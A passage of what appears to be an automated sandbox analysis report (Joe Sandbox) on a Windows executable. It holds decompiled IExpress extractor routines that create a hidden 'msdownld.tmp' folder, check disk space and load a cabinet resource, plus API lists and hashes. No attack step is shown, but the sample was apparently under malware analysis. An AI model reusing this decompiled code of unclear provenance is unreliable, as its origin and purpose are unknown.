                                                                                                                                                                                                        																				_t50 = E000C2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E000C658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0xc91e4;
                                                                                                                                                                                                        																					E000C1781(0xc91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E000C5467(0xc91e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E000C2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E000C597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E000C5467(0xc91e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0xc91e4;
                                                                                                                                                                                                        											_t70 = E000C2630(0, 0xc91e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0xc91e4;
                                                                                                                                                                                                        												_t71 = E000C5467(0xc91e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E000C597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                        							if(_t35 != 0x5c) {
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								_t72 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0xc8b3f - _t35; // 0x0
                                                                                                                                                                                                        								_t72 = 0;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                                        							_t73 = E000C5467(0xc8b3e, 0, _t72);
                                                                                                                                                                                                        							__eflags = _t73;
                                                                                                                                                                                                        							if(_t73 != 0) {
                                                                                                                                                                                                        								L45:
                                                                                                                                                                                                        								_t38 = 1;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t101 = 0x4be;
                                                                                                                                                                                                        								E000C44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L2;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t101 = 0x4b1;
                                                                                                                                                                                                        						E000C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						 *0xc9124 = 0x80070714;
                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t101 = 0x4b5;
                                                                                                                                                                                                        					E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L47:
                                                                                                                                                                                                        				return E000C6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                        			}
                                                                                                                                                                                                        0x000c5724
                                                                                                                                                                                                        0x000c5726
                                                                                                                                                                                                        0x000c5729
                                                                                                                                                                                                        0x000c5730
                                                                                                                                                                                                        0x000c5737
                                                                                                                                                                                                        0x000c573d
                                                                                                                                                                                                        0x000c5740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c572b
                                                                                                                                                                                                        0x000c572b
                                                                                                                                                                                                        0x000c572e
                                                                                                                                                                                                        0x000c5742
                                                                                                                                                                                                        0x000c5742
                                                                                                                                                                                                        0x000c5745
                                                                                                                                                                                                        0x000c576b
                                                                                                                                                                                                        0x000c576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5747
                                                                                                                                                                                                        0x000c5747
                                                                                                                                                                                                        0x000c574d
                                                                                                                                                                                                        0x000c574f
                                                                                                                                                                                                        0x000c5771
                                                                                                                                                                                                        0x000c5771
                                                                                                                                                                                                        0x000c5773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5751
                                                                                                                                                                                                        0x000c5751
                                                                                                                                                                                                        0x000c5753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5755
                                                                                                                                                                                                        0x000c575b
                                                                                                                                                                                                        0x000c5760
                                                                                                                                                                                                        0x000c5762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5764
                                                                                                                                                                                                        0x000c5764
                                                                                                                                                                                                        0x000c5769
                                                                                                                                                                                                        0x000c577e
                                                                                                                                                                                                        0x000c577e
                                                                                                                                                                                                        0x000c5781
                                                                                                                                                                                                        0x000c5788
                                                                                                                                                                                                        0x000c578d
                                                                                                                                                                                                        0x000c578f
                                                                                                                                                                                                        0x000c57b2
                                                                                                                                                                                                        0x000c57b8
                                                                                                                                                                                                        0x000c57bd
                                                                                                                                                                                                        0x000c57bf
                                                                                                                                                                                                        0x000c57cd
                                                                                                                                                                                                        0x000c57cd
                                                                                                                                                                                                        0x000c57dd
                                                                                                                                                                                                        0x000c57e3
                                                                                                                                                                                                        0x000c57ef
                                                                                                                                                                                                        0x000c57f5
                                                                                                                                                                                                        0x000c57f8
                                                                                                                                                                                                        0x000c580a
                                                                                                                                                                                                        0x000c580a
                                                                                                                                                                                                        0x000c57fa
                                                                                                                                                                                                        0x000c5802
                                                                                                                                                                                                        0x000c5802
                                                                                                                                                                                                        0x000c580d
                                                                                                                                                                                                        0x000c580f
                                                                                                                                                                                                        0x000c5830
                                                                                                                                                                                                        0x000c5836
                                                                                                                                                                                                        0x000c583d
                                                                                                                                                                                                        0x000c584b
                                                                                                                                                                                                        0x000c5851
                                                                                                                                                                                                        0x000c5855
                                                                                                                                                                                                        0x000c585a
                                                                                                                                                                                                        0x000c585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c585e
                                                                                                                                                                                                        0x000c585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c585e
                                                                                                                                                                                                        0x000c5811
                                                                                                                                                                                                        0x000c5817
                                                                                                                                                                                                        0x000c5819
                                                                                                                                                                                                        0x000c581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c581f
                                                                                                                                                                                                        0x000c5791
                                                                                                                                                                                                        0x000c5797
                                                                                                                                                                                                        0x000c579c
                                                                                                                                                                                                        0x000c579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c57a0
                                                                                                                                                                                                        0x000c57a9
                                                                                                                                                                                                        0x000c57ae
                                                                                                                                                                                                        0x000c57b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c57b0
                                                                                                                                                                                                        0x000c579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5769
                                                                                                                                                                                                        0x000c5762
                                                                                                                                                                                                        0x000c5753
                                                                                                                                                                                                        0x000c574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5864
                                                                                                                                                                                                        0x000c5864
                                                                                                                                                                                                        0x000c5864
                                                                                                                                                                                                        0x000c5717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56c3
                                                                                                                                                                                                        0x000c56c5
                                                                                                                                                                                                        0x000c56c9
                                                                                                                                                                                                        0x000c56ce
                                                                                                                                                                                                        0x000c56d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56d6
                                                                                                                                                                                                        0x000c56d6
                                                                                                                                                                                                        0x000c56d8
                                                                                                                                                                                                        0x000c56dd
                                                                                                                                                                                                        0x000c56df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c56e1
                                                                                                                                                                                                        0x000c56e2
                                                                                                                                                                                                        0x000c56e4
                                                                                                                                                                                                        0x000c56e6
                                                                                                                                                                                                        0x000c56eb

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000C55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 000C5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 000C564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000C5620
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000C56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 000C571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 000C5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000C57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000C57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 000C5802
                                                                                                                                                                                                          • Part of subcall function 000C2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 000C2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 000C5830
                                                                                                                                                                                                          • Part of subcall function 000C6517: FindResourceA.KERNEL32(000C0000,000007D6,00000005), ref: 000C652A
                                                                                                                                                                                                          • Part of subcall function 000C6517: LoadResource.KERNEL32(000C0000,00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000C6538
                                                                                                                                                                                                          • Part of subcall function 000C6517: DialogBoxIndirectParamA.USER32(000C0000,00000000,00000547,000C19E0,00000000), ref: 000C6557
                                                                                                                                                                                                          • Part of subcall function 000C6517: FreeResource.KERNEL32(00000000,?,?,000C2EE8,00000000,000C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000C6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 000C5878
                                                                                                                                                                                                          • Part of subcall function 000C597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000C59A8
                                                                                                                                                                                                          • Part of subcall function 000C597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000C59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-1384155332
                                                                                                                                                                                                        • Opcode ID: c1345bc44ad1343a457306c2c8a784301d89419ab545d00dca03d60b50f74ef3
                                                                                                                                                                                                        • Instruction ID: 170b7ffc078a3a70c09d65a58c8672aaa2b0ec53c05120b71fb14d277f5cfe58
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1345bc44ad1343a457306c2c8a784301d89419ab545d00dca03d60b50f74ef3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03817B78B04A049BEB609B709C85FFE72AD9F51346F14016DF986E3192DF74ADC58A10
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 c597d-c59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 c59dd-c5a1b GetDiskFreeSpaceA 324->325 326 c59bb-c59d8 call c44b9 call c6285 324->326 328 c5ba1-c5bde memset call c6285 GetLastError FormatMessageA 325->328 329 c5a21-c5a4a MulDiv 325->329 345 c5c05-c5c14 call c6ce0 326->345 339 c5be3-c5bfc call c44b9 SetCurrentDirectoryA 328->339 329->328 332 c5a50-c5a6c GetVolumeInformationA 329->332 335 c5a6e-c5ab0 memset call c6285 GetLastError FormatMessageA 332->335 336 c5ab5-c5aca SetCurrentDirectoryA 332->336 335->339 337 c5acc-c5ad1 336->337 343 c5ae2-c5ae4 337->343 344 c5ad3-c5ad8 337->344 351 c5c02 339->351 349 c5ae6 343->349 350 c5ae7-c5af8 343->350 344->343 347 c5ada-c5ae0 344->347 347->337 347->343 349->350 353 c5af9-c5afb 350->353 354 c5c04 351->354 355 c5afd-c5b03 353->355 356 c5b05-c5b08 353->356 354->345 355->353 355->356 357 c5b0a-c5b1b call c44b9 356->357 358 c5b20-c5b27 356->358 357->351 360 c5b29-c5b33 358->360 361 c5b52-c5b5b 358->361 360->361 362 c5b35-c5b50 360->362 363 c5b62-c5b6d 361->363 362->363 365 c5b6f-c5b74 363->365 366 c5b76-c5b7d 363->366 367 c5b85 365->367 368 c5b7f-c5b81 366->368 369 c5b83 366->369 370 c5b96-c5b9f 367->370 371 c5b87-c5b94 call c268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E000C597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v788;
                                                                                                                                                                                                        				long _v792;
                                                                                                                                                                                                        				long _v796;
                                                                                                                                                                                                        				long _v800;
                                                                                                                                                                                                        				signed int _v804;
                                                                                                                                                                                                        				long _v808;
                                                                                                                                                                                                        				int _v812;
                                                                                                                                                                                                        				long _v816;
                                                                                                                                                                                                        				long _v820;
                                                                                                                                                                                                        				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xc8004; // 0x374600bf
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xc9124 = E000C6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E000C44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xc9a34 & 0x00000008;
							if(( *0xc9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xc9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xc89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xc9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E000C268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xc9a38; // 0x0
							_t110 =  *((intOrPtr*)(0xc89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xc89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xc9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E000C44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xc9124 = E000C6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E000C44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xc9124 = E000C6285();
					_t66 = 0;
					L33:
					return E000C6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




































                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000C59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 000C59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 000C5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 000C5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000C5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000C5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 000C5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 000C5BFC
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: 6576dfefde3bbcea94bf413b5ddba8e8bf42365277b4ee9edd5ad526ba7f2fde
                                                                                                                                                                                                        • Instruction ID: f2d625c3607ef5bf5f410298d4bcfb67e3d933360c4473e9824a21666218f924
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6576dfefde3bbcea94bf413b5ddba8e8bf42365277b4ee9edd5ad526ba7f2fde
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 477192B5A0060CAFEB659B60CC89FFF77ACFB48345F5441ADF80596181DB34AE848B61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 c4fe0-c501a call c468f FindResourceA LoadResource LockResource 377 c5020-c5027 374->377 378 c5161-c5163 374->378 379 c5029-c5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 c5057-c505e call c4efd 377->380 379->380 383 c507c-c50b4 380->383 384 c5060-c5077 call c44b9 380->384 389 c50e8-c5104 call c44b9 383->389 390 c50b6-c50da 383->390 388 c5107-c510e 384->388 391 c511d-c511f 388->391 392 c5110-c5117 FreeResource 388->392 398 c5106 389->398 390->398 402 c50dc 390->402 394 c513a-c5141 391->394 395 c5121-c5127 391->395 392->391 400 c515f 394->400 401 c5143-c514a 394->401 395->394 399 c5129-c5135 call c44b9 395->399 398->388 399->394 400->378 401->400 404 c514c-c5159 SendMessageA 401->404 405 c50e3-c50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E000C4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				struct HWND__* _t9;
                                                                                                                                                                                                        				int _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        				struct HWND__* _t27;
                                                                                                                                                                                                        				intOrPtr _t29;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				CHAR* _t36;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t36 = "CABINET";
